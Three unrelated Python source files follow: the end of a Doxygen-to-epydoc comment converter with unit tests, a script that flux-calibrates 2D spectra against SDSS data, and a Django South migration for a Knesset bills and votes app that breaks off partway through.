"relatesalso",
"remarks",
"return",
"retval",
"sa",
"section",
"see",
"showinitializer",
"since",
"skip",
"skipline",
"struct",
"subpage",
"subsection",
"subsubsection",
"test",
"throw",
("todo","TODO"),
"tparam",
"typedef",
"union",
"until",
"var",
"verbatim",
"verbinclude",
"version",
"warning",
"weakgroup",
"xmlonly",
"xrefitem",
# "$",
# "@",
# "\",
# "&",
# "~",
# "<",
# ">",
# "#",
# "%",
]
for command in replacement_list:
try:
old,new = command
except ValueError:
old = command
new = command.capitalize()+":"
tmp_str = clean(tmp_str, "@"+old, new)
tmp_str = clean(tmp_str, "\\"+old, new)
# Replace any remaining unescaped backslashes with an escaped backslash
tmp_str = re.sub(r'([^\\])\\([^\\])', r'\1\\\\\2', tmp_str)
return tmp_str
#clear_str()
#class doxygen_doc_extractor
# Category 3 of doxygen comments, (only) on the same line as item being documented
# e.g. int foo; //!< foo is an integer...
# can start with "//!", "///" or "/**"
dox3a_re = re.compile(r'//[!/]<(.*)') # "//!" or "///"
dox3b_re = re.compile(r'/\*\*<(.*)\*/') # "/**<", ended by "*/"
def extract_same_line_doc(line):
m = dox3a_re.search(line)
if m:
return m.group(1)
m = dox3b_re.search(line)
if m:
return m.group(1)
return None
dox_end1_re = re.compile(r'^\s*///.*$') # anything starting with "///"
dox_end2_re = re.compile(r'^\s*/\*[!*].*\*/\s*$') # One line comment "/** whatever */"
dox_end3_re = re.compile(r'.*\*/\s*$') # end of multiline doxygen comment "whatever */"
one_line_comment_re = re.compile(r'^.*/\*.*\*/.*$') # anything with a one line "/* whatever */" comment
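# For example, "/// a brief comment" matches dox_end1_re, "/** one liner */"
# matches dox_end2_re, and a line closing a multi-line block such as
# " * last line */" matches dox_end3_re without matching one_line_comment_re.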
def might_be_doxygen_comment_end_line(line):
if dox_end1_re.match(line):
return True
if dox_end2_re.match(line):
return True
if dox_end3_re.match(line):
if not one_line_comment_re.match(line):
return True
return False
def is_blank_line(line):
if line.strip() == "":
return True
return False
def clean(str, old, new=""):
"This is the best I could figure for missing clean() function --cmb"
if not str:
return ""
return str.replace(old, new)
def is_cpp_comment_line(line):
"whether line is a c++ style doxygen comment"
if line.lstrip().startswith("///"):
return True
if line.lstrip().startswith("//!"):
return True
return False
def is_c_end_comment(line):
"Line ends, but does not begin, a c-style comment"
if not line.rstrip().endswith("*/"):
return False
if line.find("/*") >= 0:
return False
return True
def is_oneline_c_comment(line):
if not line.rstrip().endswith("*/"):
return False
if line.lstrip().startswith("/**"):
return True
if line.lstrip().startswith("/*!"):
return True
return False
def is_c_start_comment(line):
if line.rstrip().endswith("*/"):
return False # want start only, with no end
if line.lstrip().startswith("/**"):
return True
if line.lstrip().startswith("/*!"):
return True
return False
def is_c_nondoxygen_start_comment(line):
if line.lstrip().startswith("/*"):
return True
return False
class TestDocExtractor(unittest.TestCase):
def test_clear(self):
self.assertEqual(clear_str(r" /* f"), " f")
self.assertEqual(clear_str(r" f"), " f")
self.assertEqual(clear_str(r" f */"), " f")
self.assertEqual(clear_str(r" \brief f "), " f")
self.assertEqual(
clear_str(r" @param foo desc f"),
r" @param foo: desc f") # epydoc format
self.assertEqual(
clear_str(r" \param foo desc f"),
r" @param foo: desc f") # epydoc format
self.assertEqual(
clear_str(r" @param foo: desc f"),
r" @param foo: desc f") # epydoc input should remain unchanged
self.assertEqual(
clear_str(r" the \p foo parameter"),
r" the L{foo} parameter")
self.assertEqual( # clear trailing newlines
clear_str(" foo \n"),
r" foo")
# convert html list to epydoc list
self.assertEqual(
clear_str(" <li>foo</li>"),
r" - foo")
# convert doxygen \par to epydoc sections
self.assertEqual(
clear_str(r" \par Theory:"),
" Theory:\n -------")
def test_finalize(self):
ex = doxygen_doc_extractor()
ex.declaration = ""
self.assertEqual(ex.finalize_doc_lines(["f"]), '"f"')
self.assertEqual(ex.finalize_doc_lines(["", "f", ""]), '"f"')
self.assertEqual(ex.finalize_doc_lines(
["", "f", "g", ""]),
r'"f\ng"')
self.assertEqual(ex.finalize_doc_lines(
["", "f", " g", ""]),
r'"f\n g"')
if __name__ == "__main__":
unittest.main()
|
|
"""
This script can be used to flux calibrate an image slicer 2D spectra to SDSS one (of the same target).
Matches the slit width to SDSS fiber, takes into account the difference in area covered
using a boosting factor and fractional pixels.
.. Warning:: One should only fit the observed spectrum that has been recorded at the same place
as the SDSS spectrum. Otherwise the fitting will artificially throw the flux
calibration off.
:requires: PyFITS
:requires: NumPy
:requires: SciPy
:requires: matplotlib
:requires: SamPy
:author: Sami-Matias Niemi
:contact: sniemi@unc.edu
:version: 0.5
"""
import os, sys, datetime
import ConfigParser
from optparse import OptionParser
import pyfits as pf
import numpy as np
import scipy.ndimage.filters as filt
import scipy.interpolate as interpolate
from matplotlib import pyplot as plt
import SamPy.fits.basics as basics
import SamPy.fitting.fits as ff
import SamPy.image.manipulation as m
class calibrateToSDSS():
"""
This class can be used to flux calibrate an image
slicer 2D spectra to SDSS one (of the same target).
"""
def __init__(self, configfile, debug, section='DEFAULT'):
"""
Class constructor.
:param configfile: name of the configuration file
:type configfile: string
        :param debug: whether to output debugging information or not
:type debug: boolean
:param section: configure file section to read
:type section: string
"""
self.configfile = configfile
self.section = section
self.debug = debug
self.fitting = {}
def _readConfigs(self):
"""
Reads in the config file information using configParser.
"""
self.config = ConfigParser.RawConfigParser()
self.config.readfp(open(self.configfile))
def _processConfigs(self):
"""
        Processes configuration information read by the _readConfigs method and stores the results in the fitting dictionary.
"""
self.fitting['sigma'] = self.config.getfloat(self.section, 'sigma')
self.fitting['ycenter'] = self.config.getint(self.section, 'ycenter')
self.fitting['width'] = self.config.getfloat(self.section, 'width')
self.fitting['platescale'] = self.config.getfloat(self.section, 'platescale')
self.fitting['binning'] = self.config.getint(self.section, 'binning')
self.fitting['FiberDiameter'] = self.config.getfloat(self.section, 'fiberDiameter')
self.fitting['sdss'] = self.config.get(self.section, 'SDSSspectrum')
self.fitting['observed'] = self.config.get(self.section, 'observedspectrum')
self.fitting['order'] = self.config.getint(self.section, 'order')
names = list(self.config.get(self.section, 'update').strip().split(','))
self.fitting['update'] = [name.strip() for name in names]
if self.debug:
print '\nConfiguration parameters:'
print self.fitting
def _loadData(self):
"""
Loads the FITS files using PyFITS and converts the SDSS flux to flux units.
"""
self.fitting['sdssData'] = pf.open(self.fitting['sdss'])[1].data
self.fitting['SDSSflux'] = self.fitting['sdssData']['FLUX']*1e-17
self.fitting['SDSSwave'] = self.fitting['sdssData']['WAVELENGTH']
self.fitting['obsData'] = pf.open(self.fitting['observed'])[0].data
self.fitting['obsHeader'] = pf.open(self.fitting['observed'])[0].header
def _calculateArea(self):
"""
Calculates the fiber area and the ratio of the fiber to slit area.
Calculates the number of pixels around the center that should be included.
Calculates also the fraction that the full pixels do not cover to be used
later to take into account the "missing flux".
"""
self.fitting['FiberArea'] = np.pi*(self.fitting['FiberDiameter'] / 2.)**2
self.fitting['slitPixels'] = self.fitting['FiberDiameter'] / \
self.fitting['platescale'] / \
self.fitting['binning']
self.fitting['slitPix2'] = int(np.floor((self.fitting['slitPixels'] - 1.0) / 2.))
self.fitting['slitPixFractional'] = self.fitting['slitPixels'] - (2*self.fitting['slitPix2'] + 1.)
self.fitting['boosting'] = self.fitting['FiberArea'] / \
(self.fitting['width'] * self.fitting['slitPixels'])
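        # Illustrative numbers only (not from any real configuration): with
        # FiberDiameter=3.0", platescale=0.3"/pix, binning=1 and width=0.5",
        # slitPixels=10.0, slitPix2=4, slitPixFractional=1.0,
        # FiberArea~7.07 arcsec^2 and boosting~1.41.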
def _deriveObservedSpectra(self):
"""
Derives a 1D spectrum from the 2D input data.
Sums the pixels around the centre of the continuum that match to the SDSS fiber size.
Multiplies the flux in the pixels next to the last full ones to include with the
fractional flux we would otherwise be "missing".
"""
#y center and how many full pixels on either side we can include that would still
#be within the SDSS fiber
y = self.fitting['ycenter']
ymod = self.fitting['slitPix2']
#modify the lines of the fractional pixel information
self.fitting['obsData'][y+ymod+1, :] *= (self.fitting['slitPixFractional'] / 2.)
self.fitting['obsData'][y-ymod-1, :] *= (self.fitting['slitPixFractional'] / 2.)
#sum the flux
self.fitting['obsSpectrum'] = np.sum(self.fitting['obsData'][y-ymod-1:y+ymod+2, :], axis=0) / \
self.fitting['boosting']
#match the resolution, i.e. convolve the observed spectrum with a Gaussian
self.fitting['obsSpectraConvolved'] = filt.gaussian_filter1d(self.fitting['obsSpectrum'],
self.fitting['sigma'])
#get a wavelength scale
self.fitting['obsWavelengths'] = basics.getWavelengths(self.fitting['observed'],
len(self.fitting['obsSpectraConvolved']))
def _calculateDifference(self):
"""
Calculates the difference between the derived observed and SDSS spectra.
Interpolates the SDSS spectra to the same wavelength scale.
.. Warning:: We do not conserve flux here when interpolating. This is because
we do not actually interpolate flux but flux density which is per
angstrom.
"""
ms = (self.fitting['SDSSwave'] >= np.min(self.fitting['obsWavelengths'])) &\
(self.fitting['SDSSwave'] <= np.max(self.fitting['obsWavelengths']))
newflux = m.frebin(self.fitting['SDSSflux'][ms],
len(self.fitting['obsSpectraConvolved']))#, total=True)
self.fitting['spectraRatio'] = self.fitting['obsSpectraConvolved'] / newflux
self.fitting['interpFlux'] = newflux
def _generateMask(self):
"""
Generates a mask in which Halpha and some other lines have been masked out.
        :todo: The masked-out regions have been hardcoded. This should be changed, as
now depending on the redshift of the galaxy the masking region may not
fully cover the feature.
"""
#TODO: remove the hardcoded lines
halph = [6660, 6757]
msk = ~((self.fitting['obsWavelengths'] >= halph[0]) & (self.fitting['obsWavelengths'] <= halph[1])) & \
~((self.fitting['obsWavelengths'] >= 6000) & (self.fitting['obsWavelengths'] <= 6040)) & \
~((self.fitting['obsWavelengths'] >= 6030) & (self.fitting['obsWavelengths'] <= 6070))
self.fitting['mask'] = msk
def _fitSmoothFunction(self):
"""
Fits a smooth function to the spectra ratio.
Uses the NumPy polyfit to do the fitting.
"""
fx = np.poly1d(np.polyfit(self.fitting['obsWavelengths'][self.fitting['mask']],
self.fitting['spectraRatio'][self.fitting['mask']],
self.fitting['order']))
self.fitting['fit'] = fx(self.fitting['obsWavelengths'])
if self.debug:
print '\nFitting parameters:'
print fx
def _generatePlots(self):
"""
Generate some plots showing the fit and the spectra.
These plots are not crucial but rather a convenience when
inspecting whether the derived fit was reasonable and how
much the flux values have been modified.
"""
#first
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(self.fitting['SDSSwave'], self.fitting['SDSSflux'], label='SDSS')
ax.plot(self.fitting['obsWavelengths'][self.fitting['mask']],
self.fitting['obsSpectraConvolved'][self.fitting['mask']],
label='Convolved and Masked')
ax.plot(self.fitting['obsWavelengths'],
self.fitting['obsSpectrum']/self.fitting['fit'],
label='Fitted Spectra')
ax.set_ylabel('Flux [erg/cm**2/s/AA]')
ax.set_xlabel('Wavelength [AA]')
ax.set_xlim(3800, 9200)
plt.legend(shadow=True, fancybox=True)
plt.savefig('Spectra.pdf')
ax.set_xlim(5450, 6950)
plt.savefig('SpectraZoomed.pdf')
plt.close()
#second
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(self.fitting['obsWavelengths'][self.fitting['mask']],
self.fitting['spectraRatio'][self.fitting['mask']], s = 2,
label = 'Observed Spectra / SDSS (masked)')
ax.plot(self.fitting['obsWavelengths'], self.fitting['fit'], 'r-',
label = 'Fit')
#ax.plot(self.fitting['obsWavelengths'], self.fitting['fit2'], 'g-',
# label = 'Fit2')
ax.set_ylabel('Ratio')
ax.set_xlabel('Wavelength [AA]')
plt.legend(shadow=True, fancybox=True, numpoints=1)
plt.savefig('Fitting.pdf')
plt.close()
def _outputSensitivity(self):
"""
Outputs the sensitivity function to an ascii file. This file can be used later
for other calibrations if needed.
"""
fh = open('sensitivity.txt', 'w')
fh.write('#Wavelength sensitivity\n')
for a, b in zip(self.fitting['obsWavelengths'], self.fitting['fit']):
fh.write(str(a) + ' ' + str(b) + '\n')
fh.close()
def _updateFITSfiles(self):
"""
Updates the FITS files that were given in the configuration file with the derived flux factor.
Interpolates the fitted ratio function if the wavelength scale of the file
to be updated is different.
"""
#must interpolate the fitted function to right wavelength scale
interp = interpolate.interp1d(self.fitting['obsWavelengths'], self.fitting['fit'])
#loop over the files to be updated.
for file in self.fitting['update']:
fh = pf.open(file)
hdu = fh[0].header
data = fh[0].data
ft = interp(basics.getWavelengths(file, len(data[0,:])))
for i, line in enumerate(data):
data[i, :] = line / ft
new = file.split('.fits')[0] + 'senscalib.fits'
hdu.add_history('Original File: %s' % file)
hdu.add_history('Pixel values modified by fluxCalibrateToSDSS.py (SMN)')
hdu.add_history('Updated: %s' % datetime.datetime.isoformat(datetime.datetime.now()))
if os.path.isfile(new):
os.remove(new)
fh.writeto(new, output_verify='ignore')
fh.close()
if self.debug:
                print('\nFile %s updated and saved as %s' % (file, new))
def run(self):
"""
Driver function that should be called if all steps of the class should be performed.
"""
self._readConfigs()
self._processConfigs()
self._loadData()
self._calculateArea()
self._deriveObservedSpectra()
self._calculateDifference()
self._generateMask()
self._fitSmoothFunction()
self._generatePlots()
self._outputSensitivity()
self._updateFITSfiles()
def processArgs(printHelp=False):
"""
Processes command line arguments.
"""
parser = OptionParser()
parser.add_option('-c', '--configfile', dest='configfile',
help="Name of the configuration file", metavar="string")
parser.add_option('-s', '--section', dest='section',
help="Name of the section of the config file", metavar="string")
parser.add_option('-d', '--debug', dest='debug', action='store_true',
help='Debugging mode on')
if printHelp:
parser.print_help()
else:
return parser.parse_args()
if __name__ == '__main__':
#the script starts here
opts, args = processArgs()
if opts.configfile is None:
processArgs(True)
sys.exit(1)
if opts.section is None:
calibrate = calibrateToSDSS(opts.configfile, opts.debug)
else:
calibrate = calibrateToSDSS(opts.configfile, opts.debug, opts.section)
calibrate.run()
|
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Bill'
db.create_table('laws_bill', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=1000)),
('law', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='bills', null=True, to=orm['laws.Law'])),
('stage', self.gf('django.db.models.fields.CharField')(max_length=10)),
('stage_date', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('knesset_proposal', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='bills', null=True, to=orm['laws.KnessetProposal'])),
('first_vote', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='bills_first', null=True, to=orm['laws.Vote'])),
('approval_vote', self.gf('django.db.models.fields.related.OneToOneField')(blank=True, related_name='bill_approved', unique=True, null=True, to=orm['laws.Vote'])),
))
db.send_create_signal('laws', ['Bill'])
# Adding M2M table for field proposals on 'Bill'
db.create_table('laws_bill_proposals', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('privateproposal', models.ForeignKey(orm['laws.privateproposal'], null=False))
))
db.create_unique('laws_bill_proposals', ['bill_id', 'privateproposal_id'])
# Adding M2M table for field pre_votes on 'Bill'
db.create_table('laws_bill_pre_votes', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('vote', models.ForeignKey(orm['laws.vote'], null=False))
))
db.create_unique('laws_bill_pre_votes', ['bill_id', 'vote_id'])
# Adding M2M table for field first_committee_meetings on 'Bill'
db.create_table('laws_bill_first_committee_meetings', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('committeemeeting', models.ForeignKey(orm['committees.committeemeeting'], null=False))
))
db.create_unique('laws_bill_first_committee_meetings', ['bill_id', 'committeemeeting_id'])
# Adding M2M table for field second_committee_meetings on 'Bill'
db.create_table('laws_bill_second_committee_meetings', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('committeemeeting', models.ForeignKey(orm['committees.committeemeeting'], null=False))
))
db.create_unique('laws_bill_second_committee_meetings', ['bill_id', 'committeemeeting_id'])
# Adding M2M table for field proposers on 'Bill'
db.create_table('laws_bill_proposers', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('bill', models.ForeignKey(orm['laws.bill'], null=False)),
('member', models.ForeignKey(orm['mks.member'], null=False))
))
db.create_unique('laws_bill_proposers', ['bill_id', 'member_id'])
def backwards(self, orm):
# Deleting model 'Bill'
db.delete_table('laws_bill')
# Removing M2M table for field proposals on 'Bill'
db.delete_table('laws_bill_proposals')
# Removing M2M table for field pre_votes on 'Bill'
db.delete_table('laws_bill_pre_votes')
# Removing M2M table for field first_committee_meetings on 'Bill'
db.delete_table('laws_bill_first_committee_meetings')
# Removing M2M table for field second_committee_meetings on 'Bill'
db.delete_table('laws_bill_second_committee_meetings')
# Removing M2M table for field proposers on 'Bill'
db.delete_table('laws_bill_proposers')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'committees.committee': {
'Meta': {'object_name': 'Committee'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committees'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'committees.committeemeeting': {
'Meta': {'object_name': 'CommitteeMeeting'},
'committee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['committees.Committee']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_string': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mks_attended': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committee_meetings'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'protocol_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'topics': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'votes_mentioned': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'committee_meetings'", 'blank': 'True', 'to': "orm['laws.Vote']"})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'laws.bill': {
'Meta': {'object_name': 'Bill'},
'approval_vote': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'bill_approved'", 'unique': 'True', 'null': 'True', 'to': "orm['laws.Vote']"}),
'first_committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_first'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'first_vote': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills_first'", 'null': 'True', 'to': "orm['laws.Vote']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'knesset_proposal': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['laws.KnessetProposal']"}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['laws.Law']"}),
'pre_votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_pre_votes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"}),
'proposals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.PrivateProposal']"}),
'proposers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'second_committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_second'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'stage': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'stage_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'laws.knessetproposal': {
'Meta': {'object_name': 'KnessetProposal'},
'booklet_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'committee': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['committees.Committee']"}),
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'originals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'knesset_proposals'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.PrivateProposal']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.law': {
'Meta': {'object_name': 'Law'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'laws.membervotingstatistics': {
'Meta': {'object_name': 'MemberVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Member']"})
},
'laws.partyvotingstatistics': {
'Meta': {'object_name': 'PartyVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'party': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Party']"})
},
'laws.privateproposal': {
'Meta': {'object_name': 'PrivateProposal'},
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'joiners': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_joined'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'proposal_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'proposers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_proposed'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.vote': {
'Meta': {'object_name': 'Vote'},
'against_party': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'controversy': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'full_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_text_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance': ('django.db.models.fields.FloatField', [], {}),
'meeting_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'time_string': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'vote_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'votes'", 'blank': 'True', 'through': "orm['laws.VoteAction']", 'to': "orm['mks.Member']"}),
'votes_count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'laws.voteaction': {
'Meta': {'object_name': 'VoteAction'},
'against_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_opposition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'vote': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['laws.Vote']"})
},
'mks.member': {
'Meta': {'object_name': 'Member'},
'area_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'blog': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['planet.Blog']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'current_party': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': "orm['mks.Party']"}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_of_death': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'family_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
